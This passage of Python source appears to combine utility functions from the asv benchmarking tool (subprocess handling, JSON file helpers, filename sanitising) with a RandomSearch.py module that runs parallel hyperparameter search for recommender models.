Default is `False`. return_stderr : bool, optional If `True`, return both the (stdout, stderr, errcode) as a tuple. env : dict, optional Specify environment variables for the subprocess. cwd : str, optional Specify the current working directory to use when running the process. redirect_stderr : bool, optional Whether to redirect stderr to stdout. In this case the returned ``stderr`` (when return_stderr == True) is an empty string. return_popen : bool, optional Whether to return immediately after subprocess.Popen. Returns ------- stdout, stderr, retcode : when return_stderr == True stdout : otherwise """ from .console import log # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', ProcessError) def get_content(header=None): content = [] if header is not None: content.append(header) if redirect_stderr: content.extend([ 'OUTPUT -------->', stdout[:-1] ]) else: content.extend([ 'STDOUT -------->', stdout[:-1], 'STDERR -------->', stderr[:-1] ]) return '\n'.join(content) if isinstance(args, six.string_types): args = [args] log.debug("Running '{0}'".format(' '.join(args))) if env and WIN and sys.version_info < (3,): # Environment keys and values cannot be unicode def _fix_env(s): return s.encode('mbcs') if isinstance(s, unicode) else s env = {_fix_env(k): _fix_env(v) for k, v in env.items()} kwargs = dict(shell=shell, env=env, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if redirect_stderr: kwargs['stderr'] = subprocess.STDOUT if WIN: kwargs['close_fds'] = False kwargs['creationflags'] = subprocess.CREATE_NEW_PROCESS_GROUP else: kwargs['close_fds'] = True posix = getattr(os, 'setpgid', None) if posix: # Run the subprocess in a separate process group, so that we # can kill it and all child processes it spawns e.g. on # timeouts. Note that subprocess.Popen will wait until exec() # before returning in parent process, so there is no race # condition in setting the process group vs. calls to os.killpg kwargs['preexec_fn'] = lambda: os.setpgid(0, 0) proc = subprocess.Popen(args, **kwargs) if return_popen: return proc last_dot_time = time.time() stdout_chunks = [] stderr_chunks = [] is_timeout = False if log.is_debug_enabled(): debug_log = DebugLogBuffer(log) dots = False else: debug_log = lambda c: None if WIN: start_time = [time.time()] is_timeout = False def stdout_reader_run(): try: while not is_timeout: c = proc.stdout.read(1) if not c: break start_time[0] = time.time() stdout_chunks.append(c) debug_log(c) finally: proc.stdout.close() def stderr_reader_run(): try: while not is_timeout: c = proc.stderr.read(1) if not c: break start_time[0] = time.time() stderr_chunks.append(c) debug_log(c) finally: proc.stderr.close() stdout_reader = threading.Thread(target=stdout_reader_run) stdout_reader.daemon = True stdout_reader.start() all_threads = [stdout_reader] if not redirect_stderr: stderr_reader = threading.Thread(target=stderr_reader_run) stderr_reader.daemon = True stderr_reader.start() all_threads.append(stderr_reader) # Wait for reader threads threads = list(all_threads) while threads: thread = threads[0] if timeout is None: remaining = None else: remaining = timeout - (time.time() - start_time[0]) if remaining <= 0: # Timeout; we won't wait for the thread to join here if not is_timeout: is_timeout = True proc.send_signal(signal.CTRL_BREAK_EVENT) threads.pop(0) continue thread.join(remaining) if not thread.is_alive(): threads.pop(0) if is_timeout: proc.terminate() # Wait a bit for the reader threads, if they're alive for thread in all_threads: thread.join(0.1) # Wait for process to exit proc.wait() else: try: if posix and is_main_thread(): # Forward signals related to Ctrl-Z handling; the child # process is in a separate process group so it won't receive # these automatically from the terminal def sig_forward(signum, frame): _killpg_safe(proc.pid, signum) if signum == signal.SIGTSTP: os.kill(os.getpid(), signal.SIGSTOP) signal.signal(signal.SIGTSTP, sig_forward) signal.signal(signal.SIGCONT, sig_forward) fds = { proc.stdout.fileno(): stdout_chunks } if not redirect_stderr: fds[proc.stderr.fileno()] = stderr_chunks while proc.poll() is None: try: if timeout is None: rlist, wlist, xlist = select.select( list(fds.keys()), [], []) else: rlist, wlist, xlist = select.select( list(fds.keys()), [], [], timeout) except select.error as err: if err.args[0] == errno.EINTR: # interrupted by signal handler; try again continue raise if len(rlist) == 0: # We got a timeout is_timeout = True break for f in rlist: output = os.read(f, PIPE_BUF) fds[f].append(output) debug_log(output) if dots and time.time() - last_dot_time > 0.5: if dots is True: log.dot() elif dots: dots() last_dot_time = time.time() finally: if posix and is_main_thread(): # Restore signal handlers signal.signal(signal.SIGTSTP, signal.SIG_DFL) signal.signal(signal.SIGCONT, signal.SIG_DFL) if proc.returncode is None: # Timeout or another exceptional condition occurred, and # the program is still running. if posix: # Terminate the whole process group _killpg_safe(proc.pid, signal.SIGTERM) for j in range(10): time.sleep(0.1) if proc.poll() is not None: break else: # Didn't terminate within 1 sec, so kill it _killpg_safe(proc.pid, signal.SIGKILL) else: proc.terminate() proc.wait() proc.stdout.flush() if not redirect_stderr: proc.stderr.flush() stdout_chunks.append(proc.stdout.read()) if not redirect_stderr: stderr_chunks.append(proc.stderr.read()) proc.stdout.close() if not redirect_stderr: proc.stderr.close() debug_log(None) stdout = b''.join(stdout_chunks) stderr = b''.join(stderr_chunks) stdout = stdout.decode('utf-8', 'replace') stderr = stderr.decode('utf-8', 'replace') if is_timeout: retcode = TIMEOUT_RETCODE else: retcode = proc.returncode if valid_return_codes is not None and retcode not in valid_return_codes: header = 'Error running {0} (exit status {1})'.format(' '.join(args), retcode) if display_error: if log.is_debug_enabled(): # Output was already printed log.error(header) else: log.error(get_content(header)) raise ProcessError(args, retcode, stdout, stderr) if return_stderr: return (stdout, stderr, retcode) else: return stdout def _killpg_safe(pgid, signo): """ Same as os.killpg, but deal with OSX/BSD """ try: os.killpg(pgid, signo) except OSError as exc: if exc.errno == errno.EPERM: # OSX/BSD may raise EPERM on killpg if the process group # already terminated pass else: raise def is_main_thread(): """ Return True if the current thread is the main thread. """ if sys.version_info[0] >= 3: return threading.current_thread() == threading.main_thread() else: return isinstance(threading.current_thread(), threading._MainThread) def write_json(path, data, api_version=None, compact=False): """ Writes JSON to the given path, including indentation and sorting. Parameters ---------- path : str File name to write data : object Data to serialize as JSON api_version : int, optional API version number compact : bool, optional Whether to produce compact, non-human readable JSON. Disables sorting and indentation. """ path = os.path.abspath(path) dirname = long_path(os.path.dirname(path)) if not os.path.exists(dirname): os.makedirs(dirname) if api_version is not None: data = dict(data) data['version'] = api_version open_kwargs = {} if sys.version_info[0] >= 3: open_kwargs['encoding'] = 'utf-8' with long_path_open(path, 'w', **open_kwargs) as fd: if not compact: json.dump(data, fd, indent=4, sort_keys=True) else: json.dump(data, fd) def load_json(path, api_version=None, js_comments=False): """ Loads JSON from the given path. Parameters ---------- path : str File name api_version : str or None API version indentifier js_comments : bool, optional Whether to allow nonstandard javascript-style comments in the file. Note that this slows down the loading significantly. """ # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', UserError) path = os.path.abspath(path) open_kwargs = {} if sys.version_info[0] >= 3: open_kwargs['encoding'] = 'utf-8' with long_path_open(path, 'r', **open_kwargs) as fd: content = fd.read() if js_comments: content = minify_json.json_minify(content) content = content.replace(",]", "]") content = content.replace(",}", "}") try: d = json.loads(content) except ValueError as e: raise UserError( "Error parsing JSON in file '{0}': {1}".format( path, six.text_type(e))) if api_version is not None: if 'version' in d: if d['version'] < api_version: raise UserError( "{0} is stored in an old file format. Run " "`asv update` to update it.".format(path)) elif d['version'] > api_version: raise UserError( "{0} is stored in a format that is newer than " "what this version of asv understands. Update " "asv to use this file.".format(path)) del d['version'] else: raise UserError( "No version specified in {0}.".format(path)) return d def update_json(cls, path, api_version): """ Perform JSON file format updates. Parameters ---------- cls : object Object containing methods update_to_X which updates the given JSON tree from version X-1 to X. path : str Path to JSON file api_version : int The current API version """ # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', UserError) d = load_json(path) if 'version' not in d: raise UserError( "No version specified in {0}.".format(path)) if d['version'] < api_version: for x in six.moves.xrange(d['version'] + 1, api_version + 1): d = getattr(cls, 'update_to_{0}'.format(x), lambda x: x)(d) write_json(path, d, api_version) elif d['version'] > api_version: raise UserError( "{0} is stored in a format that is newer than " "what this version of asv understands. " "Upgrade asv in order to use or add to " "these results.".format(path)) def iter_chunks(s, n): """ Iterator that returns elements from s in chunks of size n. """ chunk = [] for x in s: chunk.append(x) if len(chunk) == n: yield chunk chunk = [] if len(chunk): yield chunk def pick_n(items, n): """Pick n items, attempting to get equal index spacing. """ if not (n > 0): raise ValueError("Invalid number of items to pick") spacing = max(float(len(items)) / n, 1) spaced = [] i = 0 while int(i) < len(items) and len(spaced) < n: spaced.append(items[int(i)]) i += spacing return spaced def get_multiprocessing(parallel): """ If parallel indicates that we want to do multiprocessing, imports the multiprocessing module and sets the parallel value accordingly. """ if parallel != 1: import multiprocessing if parallel <= 0: parallel = multiprocessing.cpu_count() return parallel, multiprocessing return parallel, None def iter_subclasses(cls): """ Returns all subclasses of a class. """ for x in cls.__subclasses__(): yield x for y in iter_subclasses(x): yield y def hash_equal(a, b): """ Returns `True` if a and b represent the same commit hash. """ min_len = min(len(a), len(b)) return a.lower()[:min_len] == b.lower()[:min_len] def get_cpu_info(): """ Gets a human-friendly description of this machine's CPU. Returns '' if it can't be obtained. """ if sys.platform.startswith('linux'): with open("/proc/cpuinfo", "rb") as fd: lines = fd.readlines() for line in lines: if b':' in line: key, val = line.split(b':', 1) key = key.strip() val = val.strip() if key == b'model name': return val.decode('ascii') elif sys.platform.startswith('darwin'): sysctl = which('sysctl') return check_output([sysctl, '-n', 'machdep.cpu.brand_string']).strip() return '' def get_memsize(): """ Returns the amount of physical memory in this machine. Returns '' if it can't be obtained. """ if sys.platform.startswith('linux'): with open("/proc/meminfo", "rb") as fd: lines = fd.readlines() for line in lines: if b':' in line: key, val = line.split(b':', 1) key = key.strip() val = val.strip() if key == b'MemTotal': return int(val.split()[0]) elif sys.platform.startswith('darwin'): sysctl = which('sysctl') return int(check_output([sysctl, '-n', 'hw.memsize']).strip()) return '' def _get_terminal_size_fallback(): """ Returns a tuple (height, width) containing the height and width of the terminal. Fallback for when sys.get_terminal_size() doesn't exist or fails. """ try: # Unix-specific code import fcntl import termios s = struct.pack(str("HHHH"), 0, 0, 0, 0) x = fcntl.ioctl(sys.stdout, termios.TIOCGWINSZ, s) (lines, width, xpixels, ypixels) = struct.unpack(str("HHHH"), x) if lines > 12: lines -= 6 if width > 10: width -= 1 return (lines, width) except: # Fall back on environment variables, or if not set, (25, 80) try: return (int(os.environ.get('LINES')), int(os.environ.get('COLUMNS'))) except TypeError: return 25, 80 def get_terminal_width(): """ Return the terminal width, or an estimate thereof. """ try: # Python 3.3 and higher: this works under Windows and Unix return os.get_terminal_size().columns except (AttributeError, OSError): return _get_terminal_size_fallback()[1] def format_text_table(rows, num_headers=0, top_header_span_start=0, top_header_text=None): """ Format rows in as a reStructuredText table, in the vein of:: ========== ========== ========== -- top header text, span start 1 ---------- --------------------- row0col0 r0c1 r0c2 ========== ========== ========== row1col0 r1c1 r1c2 row2col0 r2c1 r2c2 ========== ========== ========== """ # Format content text_rows = [["{0}".format(item).replace("\n", " ") for item in row] for row in rows] # Ensure same number of items on all rows num_items = max(len(row) for row in text_rows) for row in text_rows: row.extend(['']*(num_items - len(row))) # Determine widths col_widths = [max(len(row[j]) for row in text_rows) + 2 for j in range(num_items)] # Pad content text_rows = [[item.center(w) for w, item in zip(col_widths, row)] for row in text_rows] # Generate result headers = [" ".join(row) for row in text_rows[:num_headers]] content = [" ".join(row) for row in text_rows[num_headers:]] separator = " ".join("-"*w for w in col_widths) result = [] if top_header_text is not None: left_span = "-".join("-"*w for w in col_widths[:top_header_span_start]) right_span = "-".join("-"*w for w in col_widths[top_header_span_start:]) if left_span and right_span: result += ["--" + " " * (len(left_span)-1) + top_header_text.center(len(right_span))] result += [" ".join([left_span, right_span])] else: result += [top_header_text.center(len(separator))] result += ["-".join([left_span, right_span])] result += headers result += [separator.replace("-", "=")] elif headers: result += headers result += [separator] result += content result = [separator.replace("-", "=")] + result result += [separator.replace("-", "=")] return "\n".join(result) def _datetime_to_timestamp(dt, divisor): delta = dt - datetime.datetime(1970, 1, 1) microseconds = (delta.days * 86400 + delta.seconds) * 10**6 + delta.microseconds value, remainder = divmod(microseconds, divisor) if remainder >= divisor//2: value += 1 return value def datetime_to_timestamp(dt): """ Convert a Python datetime object to a UNIX timestamp. """ return _datetime_to_timestamp(dt, 10**6) def datetime_to_js_timestamp(dt): """ Convert a Python datetime object to a JavaScript timestamp. """ return _datetime_to_timestamp(dt, 10**3) def js_timestamp_to_datetime(ts): """ Convert a JavaScript timestamp to a Python datetime object. """ return datetime.datetime.fromtimestamp(ts / 1000) def is_nan(x): """ Returns `True` if x is a NaN value. """ if isinstance(x, float): return x != x return False def is_na(value): """ Return True if value is None or NaN """ return value is None or is_nan(value) def mean_na(values): """ Take a mean, with the understanding that None and NaN stand for missing data. """ values = [x for x in values if not is_na(x)] if values: return sum(values) / len(values) else: return None def geom_mean_na(values): """ Compute geometric mean, with the understanding that None and NaN stand for missing data. """ values = [x for x in values if not is_na(x)] if values: exponent = 1/len(values) prod = 1.0 acc = 0 for x in values: prod *= abs(x)**exponent acc += x return prod if acc >= 0 else -prod else: return None def ceildiv(numerator, denominator): """Ceiling division""" return -((-numerator)//denominator) if not WIN: long_path_open = open long_path_rmtree = shutil.rmtree def long_path(path): return path else: def long_path(path): if path.startswith("\\\\"): return path return "\\\\?\\" + os.path.abspath(path) def _remove_readonly(func, path, exc_info): """Try harder to remove files on Windows""" if isinstance(exc_info[1], OSError) and exc_info[1].errno == errno.EACCES: # Clear read-only flag and try again try: os.chmod(path, stat.S_IWRITE | stat.S_IREAD) func(path) return except OSError: pass # Reraise original error six.reraise(*exc_info) def long_path_open(filename, *a, **kw): return open(long_path(filename), *a, **kw) def long_path_rmtree(path, ignore_errors=False): if ignore_errors: onerror = None else: onerror = _remove_readonly shutil.rmtree(long_path(path), ignore_errors=ignore_errors, onerror=onerror) def sanitize_filename(filename): """ Replace characters to make a string safe to use in file names. This is not a 1-to-1 mapping. The implementation needs to match www/asv.js:escape_graph_parameter """ if not isinstance(filename, six.text_type): filename = filename.decode(sys.getfilesystemencoding()) # ntfs & ext3 filename = re.sub('[<>:"/\\^|?*\x00-\x1f]', '_', filename) # ntfs forbidden = ["CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9"] if filename.upper() in forbidden: filename = filename + "_" return filename def namedtuple_with_doc(name, slots, doc): cls = collections.namedtuple(name, slots) if sys.version_info[0] >= 3: cls.__doc__ = doc return cls else: return type(str(name), (cls,), {'__doc__': doc}) def recvall(sock, size): """ Receive data of given size from a socket connection """ data = b"" while len(data) < size: s = sock.recv(size - len(data)) data += s if not s: raise RuntimeError("did not receive data from socket " "(size {}, got only {!r})".format(size, data)) return data def interpolate_command(command, variables): """ Parse a command with interpolated variables to a sequence of commands. The command is parsed as in posix-style shell (by shlex) and split to parts. Additional constructs recognized: - ``ENVVAR=value <command>``: parsed as declaring an environment variable named 'ENVVAR'. - ``return-code=value <command>``: parsed as declaring valid return codes. - ``in-dir=value <command>``: parsed as declaring working directory for command. Parameters ---------- command : str Command to execute, posix shell style. variables : dict Interpolation variables. Returns ------- command : list of str Command arguments. env : dict Environment variables declared in the command. return_codes : {set, int, None} Valid return codes. cwd : {str, None} Current working directory for the command, if any. """ parts = shlex.split(command) try: result = [c.format(**variables) for c in parts] except KeyError as exc: raise UserError("Configuration error: {{{0}}} not available " "when substituting into command {1!r} " "Available: {2!r}" "".format(exc.args[0], command, variables)) env = {} return_codes_set = False return_codes = {0} cwd = None while result: m = re.match('^([A-Za-z_][A-Za-z0-9_]*)=(.*)$', result[0]) if m: env[m.group(1)] = m.group(2) del result[0] continue if result[0].startswith('return-code='): if return_codes_set: raise UserError("Configuration error: multiple return-code specifications " "in command {0!r} " "".format(command)) break if result[0] == 'return-code=any': return_codes = None return_codes_set = True del result[0] continue m = re.match('^return-code=([0-9,]+)$', result[0]) if m: try: return_codes = set(int(x) for x in m.group(1).split(",")) return_codes_set = True del result[0] continue except ValueError as exc: pass raise UserError("Configuration error: invalid return-code specification " "{0!r} when substituting into command {1!r} " "".format(result[0], command)) if result[0].startswith('in-dir='): if cwd is not None: raise UserError("Configuration error: multiple in-dir specifications " "in command {0!r} " "".format(command)) break cwd = result[0][7:] del result[0] continue break return result, env, return_codes, cwd _global_locks = {} def _init_global_locks(lock_dict): """Initialize global locks in a new multiprocessing process""" _global_locks.update(lock_dict) def new_multiprocessing_lock(name): """Create a new global multiprocessing lock""" _global_locks[name] = multiprocessing.Lock() def get_multiprocessing_lock(name): """Get an existing global multiprocessing lock""" return _global_locks[name] def get_multiprocessing_pool(parallel=None): """Create a multiprocessing.Pool, managing global locks properly""" return multiprocessing.Pool(initializer=_init_global_locks, initargs=(_global_locks,)) try: from shlex import quote as shlex_quote except ImportError: _find_unsafe = re.compile(r'[^\w@%+=:,./-]').search def shlex_quote(s): """Return a shell-escaped version of the string *s*.""" if not s: return "''" if _find_unsafe(s) is None: return s # use single quotes, and put single quotes into double quotes # the string $'b is then quoted as '$'"'"'b' return "'" + s.replace("'", "'\"'\"'") + "'"
RandomSearch.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on 10/03/2018 @author: Maurizio Ferrari Dacrema """ from ParameterTuning.AbstractClassSearch import AbstractClassSearch, DictionaryKeys, writeLog from functools import partial import traceback, pickle import os, gc, math import multiprocessing from multiprocessing import Queue from queue import Empty def dump_garbage(): """ show us what's the garbage about """ # force collection print("\nGARBAGE:") gc.collect() print("\nGARBAGE OBJECTS:") for x_pos in range(len(gc.garbage)): x = gc.garbage[x_pos] s = str(x) if len(s) > 80: s = s[:80] #print("type: {} \n\t s {} \n\t reffered by: {}".format(type(x), s, gc.get_referrers(x))) print("POS: {}, type: {} \n\t s {} \n".format(x_pos, type(x), s)) print("\nDONE") pass # gc.enable() # gc.set_debug(gc.DEBUG_LEAK) import itertools, random, time def get_RAM_status(): tot_m, used_m, free_m = map(int, os.popen('free -t -m').readlines()[-1].split()[1:]) return tot_m, used_m, free_m def dereference_recommender_attributes(recommender_object): if recommender_object is None: return object_attributes = recommender_object.__dict__ for key in object_attributes.keys(): object_attributes[key] = None def get_memory_threshold_reached(max_ram_occupied_perc): if max_ram_occupied_perc is not None: tot_RAM, used_RAM, _ = get_RAM_status() max_ram_occupied_bytes = tot_RAM*max_ram_occupied_perc memory_threshold_reached = used_RAM > max_ram_occupied_bytes memory_used_quota = used_RAM/tot_RAM else: memory_threshold_reached = False memory_used_quota = 0.0 return memory_threshold_reached, memory_used_quota import sys class RandomSearch(AbstractClassSearch): ALGORITHM_NAME = "RandomSearch" def __init__(self, recommender_class, URM_test = None, evaluation_function_validation=None): super(RandomSearch, self).__init__(recommender_class, URM_test = URM_test, evaluation_function_validation= evaluation_function_validation) def build_all_cases_to_evaluate(self, n_cases): hyperparamethers_range_dictionary = self.dictionary_input[DictionaryKeys.FIT_RANGE_KEYWORD_ARGS] key_list = list(hyperparamethers_range_dictionary.keys()) # Unpack list ranges from hyperparamethers to validate onto # * operator allows to transform a list of objects into positional arguments test_cases = itertools.product(*hyperparamethers_range_dictionary.values()) paramether_dictionary_list = [] for current_case in test_cases: paramether_dictionary_to_evaluate = {} for index in range(len(key_list)): paramether_dictionary_to_evaluate[key_list[index]] = current_case[index] paramether_dictionary_list.append(paramether_dictionary_to_evaluate) # Replicate list if necessary paramether_dictionary_list = paramether_dictionary_list * math.ceil(n_cases/len(paramether_dictionary_list)) return paramether_dictionary_list def search(self, dictionary_input, metric ="map", n_cases = 30, output_root_path = None, parallelPoolSize = None, parallelize = True, save_model = "best", max_ram_occupied_perc = None): # Associate the params that will be returned by BayesianOpt object to those you want to save # E.g. with early stopping you know which is the optimal number of epochs only afterwards # but you might want to save it as well self.from_fit_params_to_saved_params = {} self.dictionary_input = dictionary_input.copy() self.output_root_path = output_root_path self.logFile = open(self.output_root_path + "_" + self.ALGORITHM_NAME + ".txt", "a") self.metric = metric self.model_counter = 0 if max_ram_occupied_perc is None: self.max_ram_occupied_perc = 0.7 else: # Try if current ram status is possible to read try: get_RAM_status() self.max_ram_occupied_perc = max_ram_occupied_perc except: writeLog(self.ALGORITHM_NAME + ": Unable to read RAM status, ignoring max RAM setting", self.logFile) self.max_ram_occupied_perc = None if save_model in ["no", "best", "all"]: self.save_model = save_model else: raise ValueError(self.ALGORITHM_NAME + ": save_model not recognized, acceptable values are: {}, given is {}".format( ["no", "best", "all"], save_model)) if parallelPoolSize is None: self.parallelPoolSize = 1 else: #self.parallelPoolSize = int(multiprocessing.cpu_count()/2) self.parallelPoolSize = parallelPoolSize self.best_solution_val = None self.best_solution_parameters = None self.best_solution_object = None paramether_dictionary_list = self.build_all_cases_to_evaluate(n_cases) # Randomize ordering of cases random.shuffle(paramether_dictionary_list) self.runSingleCase_partial = partial(self.runSingleCase, metric = metric) if parallelize: self.run_multiprocess_search(paramether_dictionary_list, n_cases) else: self.run_singleprocess_search(paramether_dictionary_list, n_cases) writeLog(self.ALGORITHM_NAME + ": Best config is: Config {}, {} value is {:.4f}\n".format( self.best_solution_parameters, metric, self.best_solution_val), self.logFile) return self.best_solution_parameters.copy() def update_on_new_result(self, process_object, num_cases_evaluated): paramether_dictionary_to_save = self.from_fit_params_to_saved_params_function(process_object.recommender, process_object.paramether_dictionary_to_evaluate) if process_object.exception is not None: writeLog(self.ALGORITHM_NAME + ": Exception for config {}: {}\n".format( self.model_counter, paramether_dictionary_to_save, str(process_object.exception)), self.logFile) return if process_object.result_dict is None: writeLog(self.ALGORITHM_NAME + ": Result is None for config {}\n".format( self.model_counter, paramether_dictionary_to_save), self.logFile) return self.model_counter += 1 # Always save best model separately if self.save_model == "all": print(self.ALGORITHM_NAME + ": Saving model in {}\n".format(self.output_root_path)) process_object.recommender.saveModel(self.output_root_path, file_name="_model_{}".format(self.model_counter)) pickle.dump(paramether_dictionary_to_save.copy(), open(self.output_root_path + "_parameters_{}".format(self.model_counter), "wb"), protocol=pickle.HIGHEST_PROTOCOL) if self.best_solution_val == None or self.best_solution_val<process_object.result_dict[self.metric]: writeLog(self.ALGORITHM_NAME + ": New best config found. Config {}: {} - results: {}\n".format( self.model_counter, paramether_dictionary_to_save, process_object.result_dict), self.logFile) pickle.dump(paramether_dictionary_to_save.copy(), open(self.output_root_path + "_best_parameters", "wb"), protocol=pickle.HIGHEST_PROTOCOL) self.best_solution_val = process_object.result_dict[self.metric] self.best_solution_parameters = paramether_dictionary_to_save.copy() dereference_recommender_attributes(self.best_solution_object) self.best_solution_object = process_object.recommender # Always save best model separately if self.save_model != "no": print(self.ALGORITHM_NAME + ": Saving model in {}\n".format(self.output_root_path)) process_object.recommender.saveModel(self.output_root_path, file_name="_best_model") if self.URM_test is not None: self.evaluate_on_test(self.URM_test) else: writeLog(self.ALGORITHM_NAME + ": Config is suboptimal. Config {}: {} - results: {}\n".format( self.model_counter, paramether_dictionary_to_save, process_object.result_dict), self.logFile) dereference_recommender_attributes(process_object.recommender) #dump_garbage() def run_singleprocess_search(self, paramether_dictionary_list, num_cases_max): num_cases_evaluated = 0 while num_cases_evaluated < num_cases_max: process_object = Process_object_data_and_evaluation(self.recommender_class, self.dictionary_input, paramether_dictionary_list[num_cases_evaluated], self.ALGORITHM_NAME, self.URM_validation, self.evaluation_function_validation) process_object.run("main") self.update_on_new_result(process_object, num_cases_evaluated) process_object = None #gc.collect() #dump_garbage() num_cases_evaluated += 1 def run_multiprocess_search(self, paramether_dictionary_list, num_cases_max): # Te following function runs the search in parallel. As different configurations might have signifiantly divergent # runtime threads must be joined from the first to terminate and the objects might be big, therefore parallel.pool is not suitable num_cases_evaluated = 0 num_cases_started = 0 num_cases_active = 0 termination_sent = False process_list = [None] * self.parallelPoolSize queue_job_todo = Queue() queue_job_done = Queue() get_memory_threshold_reached_partial = partial(get_memory_threshold_reached, max_ram_occupied_perc = self.max_ram_occupied_perc) for current_process_index in range(self.parallelPoolSize): newProcess = multiprocessing.Process(target=process_worker, args=(queue_job_todo, queue_job_done, current_process_index, get_memory_threshold_reached_partial, )) process_list[current_process_index] = newProcess newProcess.start() newProcess = None print("Started process: {}".format(current_process_index)) memory_threshold_reached, memory_used_quota = get_memory_threshold_reached(self.max_ram_occupied_perc) while num_cases_evaluated < num_cases_max: # Create as many new jobs as needed # Stop: if the max number of paralle processes is reached or the max ram occupancy is reached # if no other cases to explore # If no termination sent and active == 0, start one otherwise everything stalls # WARNING: apparently the function "queue_job_todo.empty()" is not reliable while ((num_cases_active < self.parallelPoolSize and not memory_threshold_reached) or (num_cases_active == 0)) \ and not termination_sent: memory_threshold_reached, memory_used_quota = get_memory_threshold_reached(self.max_ram_occupied_perc) if memory_threshold_reached: writeLog(self.ALGORITHM_NAME + ": Memory threshold reached, occupied {:.4f} %\n".format(memory_used_quota), self.logFile) if num_cases_started < num_cases_max and not memory_threshold_reached: process_object = Process_object_data_and_evaluation(self.recommender_class, self.dictionary_input, paramether_dictionary_list[num_cases_started], self.ALGORITHM_NAME, self.URM_validation, self.evaluation_function) queue_job_todo.put(process_object) num_cases_started += 1 num_cases_active += 1 process_object = None if num_cases_started >= num_cases_max and not termination_sent: print("Termination sent") queue_job_todo.put(None) termination_sent = True # Read all completed jobs. WARNING: apparently the function "empty" is not reliable queue_job_done_is_empty = False while not queue_job_done_is_empty: try: process_object = queue_job_done.get_nowait() self.update_on_new_result(process_object, num_cases_evaluated) num_cases_evaluated += 1 num_cases_active -=1 process_object = None except Empty: queue_job_done_is_empty = True time.sleep(1) #print("num_cases_evaluated {}".format(num_cases_evaluated)) #print("Evaluated {}, started {}, active {}".format(num_cases_evaluated, num_cases_started, num_cases_active)) queue_job_todo.get() for current_process in process_list: #print("Waiting to Join {}".format(current_process)) current_process.join() print("Joined {}".format(current_process)) def process_worker(queue_job_todo, queue_job_done, process_id, get_memory_threshold_reached): "Function to be used by the process, just run the wrapper object" process_object = queue_job_todo.get() memory_threshold_warning_printed = False while process_object is not None: # # Avoid queue.put to prevent process termination until all queue elements have been pulled # queue.cancel_join_thread() # Wait until there is enough RAM memory_threshold_reached, memory_used_quota = get_memory_threshold_reached() if not memory_threshold_reached: memory_threshold_warning_printed = False process_object.run(process_id) # "Send" result object ro main process queue_job_done.put(process_object) # Dereference process_object = None process_object = queue_job_todo.get() else: if not memory_threshold_warning_printed: memory_threshold_warning_printed = True print("Process: {} - Memory threshold reached, occupied {:.4f} %\n".format(process_id, memory_used_quota)) time.sleep(5) #Ensure termination signal stays in queue queue_job_todo.put(None) # Termination signal print("Process: {} - Termination signal received".format(process_id)) return class Process_object_data_and_evaluation(object): def __init__(self, recommender_class, dictionary_input, paramether_dictionary_to_evaluate, ALGORITHM_NAME, URM_validation, evaluation_function): super(Process_object_data_and_evaluation, self).__init__() self.recommender_class = recommender_class self.URM_validation = URM_validation self.dictionary_input = dictionary_input.copy() self.paramether_dictionary_to_evaluate = paramether_dictionary_to_evaluate.copy() self.ALGORITHM_NAME = ALGORITHM_NAME self.evaluation_function = evaluation_function self.exception = None self.recommender = None self.result_dict = None def __del__(self): # self.recommender_class = None # self.URM_validation = None # self.dictionary_input.clear() # self.paramether_dictionary_to_evaluate = None # self.ALGORITHM_NAME = None # self.evaluation_function = None # self.exception = None # self.recommender = None # self.result_dict = None object_attributes = self.__dict__ for key in object_attributes.keys(): object_attributes[key] = None def run(self, process_id): try: # Create an object of the same class of the imput # Passing the paramether as a dictionary self.recommender = self.recommender_class(*self.dictionary_input[DictionaryKeys.CONSTRUCTOR_POSITIONAL_ARGS], **self.dictionary_input[DictionaryKeys.CONSTRUCTOR_KEYWORD_ARGS]) print(self.ALGORITHM_NAME + ": Process {} Config: {}".format( process_id, self.paramether_dictionary_to_evaluate)) self.recommender.fit(*self.dictionary_input[DictionaryKeys.FIT_POSITIONAL_ARGS], **self.dictionary_input[DictionaryKeys.FIT_KEYWORD_ARGS], **self.paramether_dictionary_to_evaluate) self.result_dict = self.evaluation_function(self.recommender, self.URM_validation, self.paramether_dictionary_to_evaluate) print(self.ALGORITHM_NAME + ": Process {} Completed config: {} - result {}".format( process_id, self.paramether_dictionary_to_evaluate, self.result_dict)) #self.result_dict = {"map": 0.0} return except Exception as exception: traceback.print_exc() print(self.ALGORITHM_NAME + ": Process {} Exception {}".format( process_id, str(exception))) self.result_dict = None self.exception = exception